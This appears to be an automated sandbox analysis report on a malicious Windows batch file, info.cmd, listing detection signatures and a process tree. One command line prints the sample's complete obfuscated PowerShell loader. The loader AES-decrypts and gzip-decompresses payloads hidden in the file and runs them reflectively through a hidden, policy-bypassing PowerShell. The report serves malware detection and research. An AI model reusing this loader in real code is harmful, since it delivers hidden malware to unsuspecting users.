Windows
Analysis Report
info.cmd
Overview
General Information
Detection
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 5448, cmdline: `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2464, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4940, cmdline: `cmd /c "set __=^&rem "`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 5656, cmdline: `C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "`, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 5536, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- wermgr.exe (PID: 3360, cmdline: `"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"`, MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | 
System Summary

Source | Author
---|---
 | Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
 | frack113
 | Hieu Tran